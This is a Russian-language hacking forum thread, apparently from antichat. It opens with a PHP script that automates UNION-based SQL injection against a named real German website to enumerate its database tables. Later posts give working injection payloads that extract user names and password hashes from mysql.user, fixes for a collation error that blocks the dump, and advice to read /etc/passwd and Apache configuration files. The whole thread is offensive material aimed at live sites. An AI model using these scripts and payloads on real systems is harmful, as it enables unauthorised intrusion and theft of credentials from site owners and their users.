Настройте пожалуйста скрипт. [/PHP]<?php set_time_limit(0); $set['b']='121212';//Что находится перед выводиомй инфой $set['e']='212121';//Что находится после выводимой инфы $set['u']='http://www.engelmt.de/en/cataloque/artikelgruppen.php?id=';//URL с узвимым параметров В КОНЦЕ(!) $set['z']='-91 union select 1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from+information_schema.tables LIMIT +++counter+++,1/*';//Уязвимый параметр $set['c']='+++counter+++';//Строка счетчика $set['f']='0';//Начальное значение счетчика $set['s']='50';//Конечное значение счетчика $set['h']='www.engelmt.de';//Хост if(!empty($_GET['b']))$set['b']=$_GET['b']; if(!empty($_GET['e']))$set['e']=$_GET['e']; if(!empty($_GET['u']))$set['u']=$_GET['u']; if(!empty($_GET['z']))$set['z']=$_GET['z']; if(!empty($_GET['c']))$set['c']=$_GET['c']; if(!empty($_GET['f']))$set['f']=$_GET['f']; if(!empty($_GET['s']))$set['s']=$_GET['s']; if(!empty($_GET['h']))$set['h']=$_GET['h']; for($i=$set['f'];$i<=$set['s'];$i++) { $zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре //Создаем пакет $header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n"; $header.="Accept-Language: en-us,en;q=0.5\r\n"; $header.="Accept-Charset: utf-8,*;q=0.7\r\n"; $header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5"; $header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n"; $header.="Connection: keep-alive\r\n"; $header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n"; $header.='Cookie2: $Version=1'."\r\n"; $header.="Host: ".$set['h']."\r\n\r\n"; $dt=""; $fp=fsockopen($set['h'], 80); fwrite($fp, $header); while(!feof($fp)) $dt.=fread($fp, 1024); fclose($fp); //Вырезаем необходимую инфу $dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b'])); $dt=substr($dt,0,strpos($dt,$set['e'])); //Выводим инфу на экран echo($dt."\r\n"); flush(); } ?>
Подскажите,как бороьтся с такой ошибкой? Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION' Запрос ?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(user,password)),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+1,1/*
Незнаю как у вас, но у меня заработало, я непомню на каком именно сайте, но работало 100 %. Возможно условия разные просто. Кстате точно надо повторить... ps Сгуглил даже, http://forum.prologic.su/index.php?showtopic=3612&st=0&p=13019&#entry13019
Возможно просто синтаксис нужен правильный, или у хакеров и так покатит? http://dev.mysql.com/doc/refman/5.1/en/encryption-functions.html#function_aes-decrypt
Code: Запрос ?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/* ?id=-10256'+union+select+1,2,3,4,5,6,unhex(hex(concat_ws(0x3a,user,password))),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*
?id=-10256'+union+select+1,2,3,4,5,6,convert(concat_ws(";",user,password)+using+cp1251_general_ci),8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/* Как-то так. Не проверял.
всем спасибо,сделал так: ?id=-10256'+union+select+1,2,3,4,5,6,user,cast(password+as+binary),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+3,1/*
Linux CentOS, Fedora (Redhat-системы) /etc/httpd/conf/httpd.conf /etc/passwd /etc/groups вообщем читай все што сможеш а там подсмотриш путь) P.S. Узнай версию апача...
вот пути в этой теме https://forum.antichat.ru/thread49775.html перебирай или сиптом или на darkc0de были какието переборщики
И ещё,скажите что означает такая ошибка и как с ней бороться? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND num_begin < '' AND num_end > ''' at line 1
я тебе скажу зачем.... на разных версиях апача может путь распологатся по разному!!! соответственно затем...
